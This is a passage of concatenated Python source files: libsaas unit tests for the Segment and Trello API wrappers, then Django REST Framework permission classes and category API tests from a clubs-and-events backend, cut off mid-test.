self.assertEqual('POST', self.executor.request.method)
self.assertEqual(self.executor.request.uri,
'https://api.segment.io/v1' + uri)
params.update({'secret': 'my-api-secret'})
self.assertEqual(json.loads(self.executor.request.params), params)
def test_identify(self):
self.service.user('user_id').identify()
self.expect('/identify', {
'userId': 'user_id',
})
self.service.user('user_id').identify(traits={'foo': 'bar'})
self.expect('/identify', {
'userId': 'user_id',
'traits': {'foo': 'bar'}
})
self.service.user('user_id').identify(
context={'providers':{'all': False}})
self.expect('/identify', {
'userId': 'user_id',
'context': {'providers': {'all': False}}
})
def test_track(self):
self.service.user('user_id').track('new event')
self.expect('/track', {
'userId': 'user_id',
'event': 'new event',
})
self.service.user('user_id').track('new event', properties={'foo': 'bar'})
self.expect('/track', {
'userId': 'user_id',
'properties': {'foo': 'bar'},
'event': 'new event',
})
self.service.user('user_id').track(
'new event', context={'providers':{'all': False}})
self.expect('/track', {
'userId': 'user_id',
'event': 'new event',
'context': {'providers': {'all': False}}
})
def test_alias(self):
self.service.alias('from_user_id', 'to_user_id')
self.expect('/alias', {
'from': 'from_user_id',
'to': 'to_user_id',
})
def test_import(self):
actions = [{'action': 'track'}, {'action': 'identify'}]
context = {'providers': {'all': False}}
self.service.batch_import(actions)
self.expect('/import', {'batch': actions})
self.service.batch_import(actions, context)
self.expect('/import', {'batch': actions,
'context': context})
```
#### File: libsaas/test/test_trello.py
```python
import json
import unittest
from libsaas import http
from libsaas.executors import test_executor
from libsaas.services import trello
class TrelloTestCase(unittest.TestCase):
def setUp(self):
self.executor = test_executor.use()
self.executor.set_response(b'{}', 200, {})
self.service = trello.Trello('my-key','my-token')
def expect(self, method=None, uri=None, params={}):
if method:
self.assertEqual(method, self.executor.request.method)
        auth_params = {'key': 'my-key', 'token': 'my-token'}
if method != 'GET':
uri += '?' + http.urlencode_any(auth_params)
self.assertEqual(
self.executor.request.uri,
'https://api.trello.com/1' + uri)
if method == 'GET':
params.update(auth_params)
if params:
self.assertEqual(self.executor.request.params, params)
def test_actions(self):
self.service.action('1234').get()
self.expect('GET', '/actions/1234', {})
self.service.action('1234').get(fields=['id'])
self.expect('GET', '/actions/1234', {'fields': 'id'})
self.service.action('1234').get(fields=['id', 'name'])
self.expect('GET', '/actions/1234', {'fields': 'id,name'})
self.service.action('1234').get(member=True)
self.expect('GET', '/actions/1234', {'member': 'true'})
self.service.action('1234').field('name')
self.expect('GET', '/actions/1234/name', {})
self.service.action('1234').board().get()
self.expect('GET', '/actions/1234/board', {})
self.service.action('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/board', {'fields': 'id,name'})
self.service.action('1234').board().field('name')
self.expect('GET', '/actions/1234/board/name', {})
self.service.action('1234').card().get()
self.expect('GET', '/actions/1234/card', {})
self.service.action('1234').card().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/card', {'fields': 'id,name'})
self.service.action('1234').card().field('name')
self.expect('GET', '/actions/1234/card/name', {})
self.service.action('1234').list().get()
self.expect('GET', '/actions/1234/list', {})
self.service.action('1234').list().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/list', {'fields': 'id,name'})
self.service.action('1234').list().field('name')
self.expect('GET', '/actions/1234/list/name', {})
self.service.action('1234').member().get()
self.expect('GET', '/actions/1234/member', {})
self.service.action('1234').member().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/member', {'fields': 'id,name'})
self.service.action('1234').member().field('name')
self.expect('GET', '/actions/1234/member/name', {})
self.service.action('1234').creator().get()
self.expect('GET', '/actions/1234/memberCreator', {})
self.service.action('1234').creator().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/memberCreator', {'fields': 'id,name'})
self.service.action('1234').creator().field('name')
self.expect('GET', '/actions/1234/memberCreator/name', {})
self.service.action('1234').organization().get()
self.expect('GET', '/actions/1234/organization', {})
self.service.action('1234').organization().get(fields=['id', 'name'])
self.expect('GET', '/actions/1234/organization', {'fields': 'id,name'})
self.service.action('1234').organization().field('name')
self.expect('GET', '/actions/1234/organization/name', {})
obj = {'foo': 'bar'}
self.service.action('1234').update(obj)
self.expect('PUT', '/actions/1234', json.dumps(obj))
self.service.action('1234').delete()
self.expect('DELETE', '/actions/1234')
def test_boards(self):
self.service.board('1234').get()
self.expect('GET', '/boards/1234', {})
self.service.board('1234').get(fields=['id'])
self.expect('GET', '/boards/1234', {'fields': 'id'})
self.service.board('1234').get(fields=['id', 'name'])
self.expect('GET', '/boards/1234', {'fields': 'id,name'})
self.service.board('1234').get(action_member=True)
self.expect('GET', '/boards/1234', {'action_member': 'true'})
self.service.board('1234').field('name')
self.expect('GET', '/boards/1234/name', {})
self.service.board('1234').actions().get()
self.expect('GET', '/boards/1234/actions', {})
self.service.board('1234').actions().get(limit=10)
self.expect('GET', '/boards/1234/actions', {'limit': 10})
self.service.board('1234').cards().get()
self.expect('GET', '/boards/1234/cards', {})
self.service.board('1234').cards().get(limit=10)
self.expect('GET', '/boards/1234/cards', {'limit': 10})
self.service.board('1234').cards().filter('open')
self.expect('GET', '/boards/1234/cards/open', {})
self.service.board('1234').card('1234').get()
self.expect('GET', '/boards/1234/cards/1234', {})
self.service.board('1234').card('1234').get(fields=['id'])
self.expect('GET', '/boards/1234/cards/1234', {'fields': 'id'})
self.service.board('1234').checklists().get()
self.expect('GET', '/boards/1234/checklists', {})
self.service.board('1234').checklists().get(limit=10)
self.expect('GET', '/boards/1234/checklists', {'limit': 10})
self.service.board('1234').lists().get()
self.expect('GET', '/boards/1234/lists', {})
self.service.board('1234').lists().get(limit=10)
self.expect('GET', '/boards/1234/lists', {'limit': 10})
self.service.board('1234').lists().filter('open')
self.expect('GET', '/boards/1234/lists/open', {})
self.service.board('1234').members().get()
self.expect('GET', '/boards/1234/members', {})
self.service.board('1234').members().get(limit=10)
self.expect('GET', '/boards/1234/members', {'limit': 10})
self.service.board('1234').members().filter('normal')
self.expect('GET', '/boards/1234/members/normal', {})
self.service.board('1234').members_invited().get()
self.expect('GET', '/boards/1234/membersInvited', {})
self.service.board('1234').members_invited().get(fields=['id'])
self.expect('GET', '/boards/1234/membersInvited', {'fields': 'id'})
self.service.board('1234').memberships().get()
self.expect('GET', '/boards/1234/memberships', {})
self.service.board('1234').memberships().get(limit=10)
self.expect('GET', '/boards/1234/memberships', {'limit': 10})
self.service.board('1234').membership('1234').get()
self.expect('GET', '/boards/1234/memberships/1234', {})
self.service.board('1234').membership('1234').get(fields=['id'])
self.expect('GET', '/boards/1234/memberships/1234', {'fields': 'id'})
self.service.board('1234').organization().get()
self.expect('GET', '/boards/1234/organization', {})
self.service.board('1234').organization().get(fields=['id'])
self.expect('GET', '/boards/1234/organization', {'fields': 'id'})
self.service.board('1234').organization().field('id')
self.expect('GET', '/boards/1234/organization/id', {})
obj = {'foo': 'bar'}
self.service.boards().create(obj)
self.expect('POST', '/boards', json.dumps(obj))
self.service.board('1234').calendar_key()
self.expect('POST', '/boards/1234/calendarKey/generate')
self.service.board('1234').mark_as_viewed()
self.expect('POST', '/boards/1234/markAsViewed')
self.service.board('1234').email_key()
self.expect('POST', '/boards/1234/emailKey/generate')
self.service.board('1234').checklists().create(obj)
self.expect('POST', '/boards/1234/checklists', json.dumps(obj))
self.service.board('1234').lists().create(obj)
self.expect('POST', '/boards/1234/lists', json.dumps(obj))
self.service.board('1234').update(obj)
self.expect('PUT', '/boards/1234', json.dumps(obj))
self.service.board('1234').member('1234').update(obj)
self.expect('PUT', '/boards/1234/members/1234', json.dumps(obj))
self.service.board('1234').membership('1234').update(obj)
self.expect('PUT', '/boards/1234/memberships/1234', json.dumps(obj))
self.service.board('1234').member('1234').delete()
self.expect('DELETE', '/boards/1234/members/1234')
def test_cards(self):
self.service.card('1234').get()
self.expect('GET', '/cards/1234', {})
self.service.card('1234').get(fields=['id'])
self.expect('GET', '/cards/1234', {'fields': 'id'})
self.service.card('1234').get(fields=['id', 'name'])
self.expect('GET', '/cards/1234', {'fields': 'id,name'})
self.service.card('1234').get(attachments=True)
self.expect('GET', '/cards/1234', {'attachments': 'true'})
self.service.card('1234').field('name')
self.expect('GET', '/cards/1234/name', {})
self.service.card('1234').actions().get()
self.expect('GET', '/cards/1234/actions', {})
self.service.card('1234').actions().get(limit=10)
self.expect('GET', '/cards/1234/actions', {'limit': 10})
self.service.card('1234').attachments().get()
self.expect('GET', '/cards/1234/attachments', {})
self.service.card('1234').attachments().get(limit=10)
self.expect('GET', '/cards/1234/attachments', {'limit': 10})
self.service.card('1234').attachment('1234').get()
self.expect('GET', '/cards/1234/attachments/1234', {})
self.service.card('1234').attachment('1234').get(fields=['id'])
self.expect('GET', '/cards/1234/attachments/1234', {'fields': 'id'})
self.service.card('1234').board().get()
self.expect('GET', '/cards/1234/board', {})
self.service.card('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/cards/1234/board', {'fields': 'id,name'})
self.service.card('1234').board().field('name')
self.expect('GET', '/cards/1234/board/name', {})
self.service.card('1234').checkitem_states().get()
self.expect('GET', '/cards/1234/checkItemStates', {})
self.service.card('1234').checkitem_states().get(limit=10)
self.expect('GET', '/cards/1234/checkItemStates', {'limit': 10})
self.service.card('1234').checklists().get()
self.expect('GET', '/cards/1234/checklists', {})
self.service.card('1234').checklists().get(limit=10)
self.expect('GET', '/cards/1234/checklists', {'limit': 10})
self.service.card('1234').list().get()
self.expect('GET', '/cards/1234/list', {})
self.service.card('1234').list().get(fields=['id', 'name'])
self.expect('GET', '/cards/1234/list', {'fields': 'id,name'})
self.service.card('1234').list().field('name')
self.expect('GET', '/cards/1234/list/name', {})
self.service.card('1234').members().get()
self.expect('GET', '/cards/1234/members', {})
self.service.card('1234').members().get(limit=10)
self.expect('GET', '/cards/1234/members', {'limit': 10})
self.service.card('1234').members_voted().get()
self.expect('GET', '/cards/1234/membersVoted', {})
self.service.card('1234').members_voted().get(fields=['id'])
self.expect('GET', '/cards/1234/membersVoted', {'fields': 'id'})
self.service.card('1234').stickers().get()
self.expect('GET', '/cards/1234/stickers', {})
self.service.card('1234').stickers().get(limit=10)
self.expect('GET', '/cards/1234/stickers', {'limit': 10})
self.service.card('1234').sticker('1234').get()
self.expect('GET', '/cards/1234/stickers/1234', {})
self.service.card('1234').sticker('1234').get(fields=['id'])
self.expect('GET', '/cards/1234/stickers/1234', {'fields': 'id'})
obj = {'foo': 'bar'}
self.service.cards().create(obj)
self.expect('POST', '/cards', json.dumps(obj))
self.service.card('1234').actions().comments().create(obj)
self.expect('POST', '/cards/1234/actions/comments', json.dumps(obj))
self.service.card('1234').attachments().create(obj)
self.expect('POST', '/cards/1234/attachments', json.dumps(obj))
self.service.card('1234').checklists().create(obj)
self.expect('POST', '/cards/1234/checklists', json.dumps(obj))
self.service.card('1').checklist('2').checkitems().create(obj)
self.expect('POST', '/cards/1/checklist/2/checkItem', json.dumps(obj))
self.service.card('1').checklist('2').checkitem('3').convert_to_card()
self.expect(
'POST', '/cards/1/checklist/2/checkItem/3/convertToCard',
json.dumps({}))
self.service.card('1234').labels().create(obj)
self.expect('POST', '/cards/1234/labels', json.dumps(obj))
self.service.card('1234').members_voted().create(obj)
self.expect('POST', '/cards/1234/membersVoted', json.dumps(obj))
self.service.card('1234').update(obj)
self.expect('PUT', '/cards/1234', json.dumps(obj))
self.service.card('1234').actions().comments().update(obj)
self.expect('PUT', '/cards/1234/actions/comments', json.dumps(obj))
self.service.card('1').checklist('2').checkitem('3').update(obj)
self.expect('PUT', '/cards/1/checklist/2/checkItem/3', json.dumps(obj))
self.service.card('1').sticker('2').update(obj)
self.expect('PUT', '/cards/1/stickers/2', json.dumps(obj))
self.service.card('1').attachment('2').delete()
self.expect('DELETE', '/cards/1/attachments/2')
self.service.card('1234').actions().comments().delete()
self.expect('DELETE', '/cards/1234/actions/comments')
self.service.card('1').checklist('2').checkitem('3').delete()
self.expect('DELETE', '/cards/1/checklist/2/checkItem/3')
self.service.card('1').sticker('2').delete()
self.expect('DELETE', '/cards/1/stickers/2')
self.service.card('1').label('2').delete()
self.expect('DELETE', '/cards/1/labels/2')
def test_checklists(self):
self.service.checklist('1234').get()
self.expect('GET', '/checklists/1234', {})
self.service.checklist('1234').get(fields=['id'])
self.expect('GET', '/checklists/1234', {'fields': 'id'})
self.service.checklist('1234').get(fields=['id', 'name'])
self.expect('GET', '/checklists/1234', {'fields': 'id,name'})
self.service.checklist('1234').get(member=True)
self.expect('GET', '/checklists/1234', {'member': 'true'})
self.service.checklist('1234').field('name')
self.expect('GET', '/checklists/1234/name', {})
self.service.checklist('1234').board().get()
self.expect('GET', '/checklists/1234/board', {})
self.service.checklist('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/checklists/1234/board', {'fields': 'id,name'})
self.service.checklist('1234').board().field('name')
self.expect('GET', '/checklists/1234/board/name', {})
self.service.checklist('1234').cards().get()
self.expect('GET', '/checklists/1234/cards', {})
self.service.checklist('1234').cards().get(limit=10)
self.expect('GET', '/checklists/1234/cards', {'limit': 10})
self.service.checklist('1234').cards().filter('closed')
self.expect('GET', '/checklists/1234/cards/closed', {})
self.service.checklist('1234').checkitems().get()
self.expect('GET', '/checklists/1234/checkItems', {})
self.service.checklist('1234').checkitems().get(limit=10)
self.expect('GET', '/checklists/1234/checkItems', {'limit': 10})
self.service.checklist('1234').checkitem('1234').get()
self.expect('GET', '/checklists/1234/checkItems/1234', {})
self.service.checklist('1234').checkitem('1234').get(fields=['id'])
self.expect('GET', '/checklists/1234/checkItems/1234', {'fields': 'id'})
obj = {'foo': 'bar'}
self.service.checklists().create(obj)
self.expect('POST', '/checklists', json.dumps(obj))
self.service.checklist('1234').checkitems().create(obj)
self.expect('POST', '/checklists/1234/checkItems', json.dumps(obj))
self.service.checklist('1234').update(obj)
self.expect('PUT', '/checklists/1234', json.dumps(obj))
self.service.checklist('1234').delete()
self.expect('DELETE', '/checklists/1234')
def test_lists(self):
self.service.list('1234').get()
self.expect('GET', '/lists/1234', {})
self.service.list('1234').get(fields=['id'])
self.expect('GET', '/lists/1234', {'fields': 'id'})
self.service.list('1234').get(fields=['id', 'name'])
self.expect('GET', '/lists/1234', {'fields': 'id,name'})
self.service.list('1234').get(member=True)
self.expect('GET', '/lists/1234', {'member': 'true'})
self.service.list('1234').field('name')
self.expect('GET', '/lists/1234/name', {})
self.service.list('1234').actions().get()
self.expect('GET', '/lists/1234/actions', {})
self.service.list('1234').actions().get(limit=10)
self.expect('GET', '/lists/1234/actions', {'limit': 10})
self.service.list('1234').board().get()
self.expect('GET', '/lists/1234/board', {})
self.service.list('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/lists/1234/board', {'fields': 'id,name'})
self.service.list('1234').board().field('name')
self.expect('GET', '/lists/1234/board/name', {})
self.service.list('1234').cards().get()
self.expect('GET', '/lists/1234/cards', {})
self.service.list('1234').cards().get(limit=10)
self.expect('GET', '/lists/1234/cards', {'limit': 10})
self.service.list('1234').cards().filter('closed')
self.expect('GET', '/lists/1234/cards/closed', {})
obj = {'foo': 'bar'}
self.service.lists().create(obj)
self.expect('POST', '/lists', json.dumps(obj))
self.service.list('1234').archive_all_cards()
self.expect('POST', '/lists/1234/archiveAllCards')
self.service.list('1234').update(obj)
self.expect('PUT', '/lists/1234', json.dumps(obj))
def test_members(self):
self.service.member('1234').get()
self.expect('GET', '/members/1234', {})
self.service.member('1234').get(fields=['id'])
self.expect('GET', '/members/1234', {'fields': 'id'})
self.service.member('1234').get(fields=['id', 'name'])
self.expect('GET', '/members/1234', {'fields': 'id,name'})
self.service.member('1234').get(member=True)
self.expect('GET', '/members/1234', {'member': 'true'})
self.service.member('1234').field('name')
self.expect('GET', '/members/1234/name', {})
self.service.member('1234').actions().get()
self.expect('GET', '/members/1234/actions', {})
self.service.member('1234').actions().get(limit=10)
self.expect('GET', '/members/1234/actions', {'limit': 10})
self.service.member('1234').board_backgrounds().get()
self.expect('GET', '/members/1234/boardBackgrounds', {})
self.service.member('1234').board_backgrounds().get(limit=10)
self.expect('GET', '/members/1234/boardBackgrounds', {'limit': 10})
self.service.member('1234').board_background('1234').get()
self.expect('GET', '/members/1234/boardBackgrounds/1234', {})
self.service.member('1').board_background('2').get(fields=['id'])
self.expect('GET', '/members/1/boardBackgrounds/2', {'fields': 'id'})
self.service.member('1234').board_stars().get()
self.expect('GET', '/members/1234/boardStars', {})
self.service.member('1234').boards().get()
self.expect('GET', '/members/1234/boards', {})
self.service.member('1234').boards().get(fields=['id', 'name'])
self.expect('GET', '/members/1234/boards', {'fields': 'id,name'})
self.service.member('1234').boards().filter('closed')
self.expect('GET', '/members/1234/boards/closed', {})
self.service.member('1234').cards().get()
self.expect('GET', '/members/1234/cards', {})
self.service.member('1234').cards().get(limit=10)
self.expect('GET', '/members/1234/cards', {'limit': 10})
self.service.member('1234').cards().filter('closed')
self.expect('GET', '/members/1234/cards/closed', {})
self.service.member('1234').custom_board_backgrounds().get()
self.expect('GET', '/members/1234/customBoardBackgrounds', {})
self.service.member('1').custom_board_backgrounds().get(limit=10)
self.expect('GET', '/members/1/customBoardBackgrounds', {'limit': 10})
self.service.member('1234').custom_board_background('1234').get()
self.expect('GET', '/members/1234/customBoardBackgrounds/1234', {})
self.service.member('1').custom_board_background('2').get(
fields=['id'])
self.expect('GET', '/members/1/customBoardBackgrounds/2',
{'fields': 'id'})
self.service.member('1234').custom_stickers().get()
self.expect('GET', '/members/1234/customStickers', {})
self.service.member('1234').custom_stickers().get(limit=10)
self.expect('GET', '/members/1234/customStickers', {'limit': 10})
self.service.member('1234').custom_sticker('1234').get()
self.expect('GET', '/members/1234/customStickers/1234', {})
self.service.member('1').custom_sticker('2').get(fields=['id'])
self.expect('GET', '/members/1/customStickers/2', {'fields': 'id'})
self.service.member('1234').notifications().get()
self.expect('GET', '/members/1234/notifications', {})
self.service.member('1234').notifications().get(limit=10)
self.expect('GET', '/members/1234/notifications', {'limit': 10})
self.service.member('1234').notifications().filter('closed')
self.expect('GET', '/members/1234/notifications/closed', {})
self.service.member('1234').organizations().get()
self.expect('GET', '/members/1234/organizations', {})
self.service.member('1234').organizations().get(limit=10)
self.expect('GET', '/members/1234/organizations', {'limit': 10})
self.service.member('1234').organizations().filter('closed')
self.expect('GET', '/members/1234/organizations/closed', {})
self.service.member('1234').tokens().get()
self.expect('GET', '/members/1234/tokens', {})
self.service.member('1234').tokens().get(limit=10)
self.expect('GET', '/members/1234/tokens', {'limit': 10})
self.service.member('1234').sessions().get()
self.expect('GET', '/members/1234/sessions', {})
self.service.member('1234').sessions().get(limit=10)
self.expect('GET', '/members/1234/sessions', {'limit': 10})
obj = {'foo': 'bar'}
self.service.member('1').board_backgrounds().create(obj)
self.expect('POST', '/members/1/boardBackgrounds', json.dumps(obj))
self.service.member('1').custom_board_backgrounds().create(obj)
self.expect('POST', '/members/1/customBoardBackgrounds',
json.dumps(obj))
self.service.member('1').board_stars().create(obj)
self.expect('POST', '/members/1/boardStars', json.dumps(obj))
self.service.member('1').custom_stickers().create(obj)
self.expect('POST', '/members/1/customStickers', json.dumps(obj))
self.service.member('1234').update(obj)
self.expect('PUT', '/members/1234', json.dumps(obj))
self.service.member('1').board_background('2').update(obj)
self.expect('PUT', '/members/1/boardBackgrounds/2', json.dumps(obj))
self.service.member('1').custom_board_background('2').update(obj)
self.expect('PUT', '/members/1/customBoardBackgrounds/2',
json.dumps(obj))
self.service.member('1').board_star('2').update(obj)
self.expect('PUT', '/members/1/boardStars/2', json.dumps(obj))
self.service.member('1').board_background('2').delete()
self.expect('DELETE', '/members/1/boardBackgrounds/2')
self.service.member('1').custom_board_background('2').delete()
self.expect('DELETE', '/members/1/customBoardBackgrounds/2')
self.service.member('1').board_star('2').delete()
self.expect('DELETE', '/members/1/boardStars/2')
def test_notifications(self):
self.service.notification('1234').get()
self.expect('GET', '/notifications/1234', {})
self.service.notification('1234').get(fields=['id'])
self.expect('GET', '/notifications/1234', {'fields': 'id'})
self.service.notification('1234').get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234', {'fields': 'id,name'})
self.service.notification('1234').get(member=True)
self.expect('GET', '/notifications/1234', {'member': 'true'})
self.service.notification('1234').field('name')
self.expect('GET', '/notifications/1234/name', {})
self.service.notification('1234').board().get()
self.expect('GET', '/notifications/1234/board', {})
self.service.notification('1234').board().get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234/board', {'fields': 'id,name'})
self.service.notification('1234').board().field('name')
self.expect('GET', '/notifications/1234/board/name', {})
self.service.notification('1234').card().get()
self.expect('GET', '/notifications/1234/card', {})
self.service.notification('1234').card().get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234/card', {'fields': 'id,name'})
self.service.notification('1234').card().field('name')
self.expect('GET', '/notifications/1234/card/name', {})
self.service.notification('1234').list().get()
self.expect('GET', '/notifications/1234/list', {})
self.service.notification('1234').list().get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234/list', {'fields': 'id,name'})
self.service.notification('1234').list().field('name')
self.expect('GET', '/notifications/1234/list/name', {})
self.service.notification('1234').member().get()
self.expect('GET', '/notifications/1234/member', {})
self.service.notification('1234').member().get(fields=['id', 'name'])
self.expect('GET', '/notifications/1234/member', {'fields': 'id,name'})
self.service.notification('1234').member().field('name')
self.expect('GET', '/notifications/1234/member/name', {})
self.service.notification('1234').creator().get()
self.expect('GET', '/notifications/1234/memberCreator', {})
self.service.notification('1').creator().get(fields=['id'])
self.expect('GET', '/notifications/1/memberCreator', {'fields': 'id'})
self.service.notification('1234').creator().field('name')
self.expect('GET', '/notifications/1234/memberCreator/name', {})
self.service.notification('1234').organization().get()
self.expect('GET', '/notifications/1234/organization', {})
self.service.notification('1').organization().get(fields=['id'])
self.expect('GET', '/notifications/1/organization', {'fields': 'id'})
self.service.notification('1234').organization().field('name')
self.expect('GET', '/notifications/1234/organization/name', {})
obj = {'foo': 'bar'}
self.service.notification('1234').update(obj)
self.expect('PUT', '/notifications/1234', json.dumps(obj))
def test_organizations(self):
self.service.organization('1234').get()
self.expect('GET', '/organizations/1234', {})
self.service.organization('1234').get(fields=['id'])
self.expect('GET', '/organizations/1234', {'fields': 'id'})
self.service.organization('1234').get(fields=['id', 'name'])
self.expect('GET', '/organizations/1234', {'fields': 'id,name'})
self.service.organization('1234').get(member=True)
self.expect('GET', '/organizations/1234', {'member': 'true'})
self.service.organization('1234').field('name')
self.expect('GET', '/organizations/1234/name', {})
self.service.organization('1234').actions().get()
self.expect('GET', '/organizations/1234/actions', {})
self.service.organization('1234').actions().get(limit=10)
self.expect('GET', '/organizations/1234/actions', {'limit': 10})
self.service.organization('1234').boards().get()
self.expect('GET', '/organizations/1234/boards', {})
self.service.organization('1234').boards().get(limit=10)
self.expect('GET', '/organizations/1234/boards', {'limit': 10})
self.service.organization('1234').boards().filter('closed')
self.expect('GET', '/organizations/1234/boards/closed', {})
self.service.organization('1234').members().get()
self.expect('GET', '/organizations/1234/members', {})
self.service.organization('1234').members().get(limit=10)
self.expect('GET', '/organizations/1234/members', {'limit': 10})
self.service.organization('1234').members().filter('normal')
self.expect('GET', '/organizations/1234/members/normal', {})
self.service.organization('1234').members_invited().get()
self.expect('GET', '/organizations/1234/membersInvited', {})
self.service.organization('1').members_invited().get(fields=['id'])
self.expect('GET', '/organizations/1/membersInvited', {'fields': 'id'})
self.service.organization('1234').memberships().get()
self.expect('GET', '/organizations/1234/memberships', {})
self.service.organization('1234').memberships().get(limit=10)
self.expect('GET', '/organizations/1234/memberships', {'limit': 10})
self.service.organization('1234').membership('1234').get()
self.expect('GET', '/organizations/1234/memberships/1234', {})
obj = {'foo': 'bar'}
self.service.organizations().create(obj)
self.expect('POST', '/organizations', json.dumps(obj))
self.service.organization('1234').update(obj)
self.expect('PUT', '/organizations/1234', json.dumps(obj))
self.service.organization('1234').member('1234').update(obj)
self.expect('PUT', '/organizations/1234/members/1234', json.dumps(obj))
self.service.organization('1').membership('2').update(obj)
self.expect('PUT', '/organizations/1/memberships/2', json.dumps(obj))
self.service.organization('1234').delete()
self.expect('DELETE', '/organizations/1234')
self.service.organization('1234').member('1234').delete()
self.expect('DELETE', '/organizations/1234/members/1234')
self.service.organization('1234').membership('1234').delete()
self.expect('DELETE', '/organizations/1234/memberships/1234')
``` |
{
"source": "810Teams/clubs-and-events-backend",
"score": 2
} |
#### File: clubs-and-events-backend/asset/permissions.py
```python
from django.utils import timezone
from rest_framework import permissions
from asset.models import Announcement, Comment, Album, AlbumImage
from clubs_and_events.settings import COMMENT_DELETE_TIME
from core.permissions import IsInPubliclyVisibleCommunity, IsMemberOfCommunity, IsDeputyLeaderOfCommunity
class IsAbleToRetrieveAnnouncement(permissions.BasePermission):
''' Main permission of GET request of Announcement '''
def has_object_permission(self, request, view, obj):
''' Check permission on object '''
if isinstance(obj, Announcement):
if IsMemberOfCommunity().has_object_permission(request, view, obj):
return True
elif IsInPubliclyVisibleCommunity().has_object_permission(request, view, obj) and obj.is_publicly_visible:
return True
return False
class IsAbleToRetrieveAlbum(permissions.BasePermission):
''' Main permission of GET request of Album '''
def has_object_permission(self, request, view, obj):
''' Check permission on object '''
if isinstance(obj, Album):
if IsMemberOfCommunity().has_object_permission(request, view, obj):
return True
elif obj.community_event is not None \
and IsMemberOfCommunity().has_object_permission(request, view, obj.community_event):
return True
elif IsInPubliclyVisibleCommunity().has_object_permission(request, view, obj) and obj.is_publicly_visible:
return True
return False
class IsAbleToRetrieveAlbumImage(permissions.BasePermission):
''' Main permission of GET request of AlbumImage '''
def has_object_permission(self, request, view, obj):
''' Check permission on object '''
if isinstance(obj, AlbumImage):
return IsAbleToRetrieveAlbum().has_object_permission(request, view, obj.album)
return False
class IsAbleToDeleteComment(permissions.BasePermission):
''' Main permission of DELETE request of Comment '''
def has_object_permission(self, request, view, obj):
''' Check permission on object '''
if isinstance(obj, Comment):
if obj.created_by is not None and obj.created_by.id == request.user.id \
and obj.created_at + COMMENT_DELETE_TIME > timezone.now():
return True
elif IsDeputyLeaderOfCommunity().has_object_permission(request, view, obj):
return True
return False
```
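These classes hook into Django REST Framework's standard permission machinery, so they are attached to views like any other DRF permission. A minimal wiring sketch follows; the viewset and the serializer import are hypothetical — the project's real view configuration is not part of this excerpt.
```python
# Hypothetical wiring sketch; only the permission class comes from above.
from rest_framework import permissions, viewsets

from asset.models import Announcement
from asset.permissions import IsAbleToRetrieveAnnouncement
from asset.serializers import AnnouncementSerializer  # assumed module

class AnnouncementViewSet(viewsets.ModelViewSet):
    queryset = Announcement.objects.all()
    serializer_class = AnnouncementSerializer

    def get_permissions(self):
        # has_object_permission() is only consulted on detail routes that
        # call get_object(), so attach the object-level check there.
        if self.action == 'retrieve':
            return [permissions.IsAuthenticated(), IsAbleToRetrieveAnnouncement()]
        return [permissions.IsAuthenticated()]
```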
#### File: clubs-and-events-backend/category/tests.py
```python
from rest_framework import status
from rest_framework.test import APITestCase
from category.models import ClubType, EventType, EventSeries
class ClubTypeAPITest(APITestCase):
''' Club type API test '''
def setUp(self):
''' Set up '''
self.academic = ClubType.objects.create(title_th='วิชาการ', title_en='Academic')
self.arts = ClubType.objects.create(title_th='ศิลปะ', title_en='Arts')
self.culture = ClubType.objects.create(title_th='วัฒนธรรมและภาษา', title_en='Culture and Language')
self.entertainment = ClubType.objects.create(title_th='บันเทิง', title_en='Entertainment')
self.sports = ClubType.objects.create(title_th='กีฬา', title_en='Sports')
self.travel = ClubType.objects.create(title_th='ท่องเที่ยว', title_en='Travel')
def test_list_club_type(self):
''' Test list club type '''
response = self.client.get('/api/category/club-type/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 6)
def test_retrieve_club_type(self):
''' Test retrieve club type '''
response = self.client.get('/api/category/club-type/{}/'.format(self.academic.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('title_th', response.data.keys())
self.assertIn('title_en', response.data.keys())
def test_create_club_type(self):
''' Test create club type '''
response = self.client.post('/api/category/club-type/', {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_club_type(self):
''' Test update club type '''
response = self.client.put('/api/category/club-type/{}/'.format(self.academic.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
response = self.client.patch('/api/category/club-type/{}/'.format(self.academic.id), {
'title_th': 'ไม่ได้ตั้งชื่อ',
'title_en': 'Unnamed'
})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete_club_type(self):
''' Test delete club type '''
response = self.client.delete('/api/category/club-type/{}/'.format(self.academic.id))
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
class EventTypeAPITest(APITestCase):
''' Event type API test '''
def setUp(self):
''' Set up '''
self.academic = EventType.objects.create(title_th='วิชาการ', title_en='Academic')
self.arts = EventType.objects.create(title_th='ศิลปะ', title_en='Arts')
self.culture = EventType.objects.create(title_th='วัฒนธรรมและภาษา', title_en='Culture and Language')
self.entertainment = EventType.objects.create(title_th='บันเทิง', title_en='Entertainment')
self.sports = EventType.objects.create(title_th='กีฬา', title_en='Sports')
self.travel = EventType.objects.create(title_th='ท่องเที่ยว', title_en='Travel')
def test_list_event_type(self):
''' Test list event type '''
response = self.client.get('/api/category/event-type/')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 6)
def test_retrieve_event_type(self):
''' Test retrieve event type '''
response = self.client.get('/api/category/event-type/{}/'.format(self.academic.id))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIn('title_th', response.data.keys())
self.assertIn('title_en', response.data.keys())
def test_create_event_type(self):
''' Test create event type '''
